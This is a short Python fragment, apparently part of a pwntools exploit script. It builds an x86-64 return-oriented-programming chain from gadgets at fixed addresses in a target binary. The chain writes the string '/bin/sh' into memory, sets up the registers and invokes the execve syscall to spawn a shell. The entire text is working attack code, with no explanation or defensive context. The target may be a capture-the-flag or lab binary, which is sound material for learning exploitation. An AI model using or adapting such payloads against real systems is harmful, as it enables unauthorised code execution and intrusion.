payload = p64(0x4017ca)
#0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4172d0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4036f4)
# 0x00000000004036f4: pop rax; ret 0x10; 
payload += p64(0x4017d3)+p64(0x4029d5)+p64(0x0)+p64(0x0)
# 0x00000000004029d5: mov qword ptr [rbp - 0x260], rbx; jmp rax; 
payload += b''
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x417070)+p64(0x4036f4)
# 0x00000000004036f4: pop rax; ret 0x10; 
payload += p64(0x0)+p64(0x40841e)+p64(0x0)+p64(0x0)
# 0x000000000040841e: cdq; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4036f4)
# 0x00000000004036f4: pop rax; ret 0x10; 
payload += p64(0x3b)+p64(0x4057c0)+p64(0x0)+p64(0x0)
# 0x00000000004057c0: syscall; 
payload += b''
